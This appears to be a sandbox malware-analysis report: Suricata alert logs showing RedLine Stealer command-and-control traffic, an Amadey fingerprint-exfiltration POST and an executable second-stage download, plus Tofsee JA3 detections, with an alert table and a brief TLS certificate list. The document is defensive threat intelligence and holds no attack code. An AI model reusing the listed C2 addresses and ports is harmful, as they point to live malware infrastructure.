TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.86:19084 -> 192.168.56.103:49324	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49375 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49233 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49391 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49324 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49392 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49292 -> 142.251.220.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49320 -> 142.251.220.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49357 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.86:19084 -> 192.168.56.103:49362	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49296 -> 142.250.66.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49335 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49367 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49378 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49303 -> 142.251.130.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49196 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49386 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49387 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49307 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49389 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49390 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49319 -> 142.251.220.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49399 -> 104.94.217.48:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49401 -> 104.94.217.48:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49394 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.86:19084 -> 192.168.56.103:49330	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49406 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49408 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49416 -> 104.75.41.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49424 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49415 -> 104.75.41.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49419 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49429 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49351 -> 77.91.124.1:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49422 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49435 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49437 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49351 -> 77.91.124.1:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49434 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49421 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49439 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49436 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49426 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49445 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49431 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49452 -> 142.250.204.46:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49451 -> 142.250.204.46:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49432 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49454 -> 142.250.66.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49440 -> 18.64.8.109:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49456 -> 142.251.130.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49457 -> 142.251.130.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.124.1:80 -> 192.168.56.103:49351	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.124.1:80 -> 192.168.56.103:49351	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.124.1:80 -> 192.168.56.103:49351	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49368 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49330 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49374 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49370 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49376 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49372 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49379 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49373 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49393 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49381 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49397 -> 104.94.217.48:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49259 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49383 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49423 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49262 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49384 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49420 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49385 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49425 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49428 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49279 -> 18.64.8.127:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49407 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49441 -> 18.64.8.109:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49430 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49285 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49308 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49442 -> 18.64.8.109:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49316 -> 216.58.200.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49446 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49447 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49336 -> 142.250.66.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49458 -> 142.251.130.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49461 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49460 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49340 -> 172.217.31.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.86:19084 -> 192.168.56.103:49348	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49348 -> 77.91.124.86:19084	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49371 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49377 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49380 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49388 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49396 -> 104.94.217.48:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49398 -> 104.94.217.48:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 104.94.217.48:443 -> 192.168.56.103:49400	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49403 -> 104.94.217.48:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49405 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49418 -> 54.175.89.124:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49417 -> 54.175.89.124:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49427 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49433 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49438 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49444 -> 146.75.49.21:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49455 -> 142.250.66.42:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49202 142.250.66.45:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1 192.168.56.103:49201 142.250.66.45:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
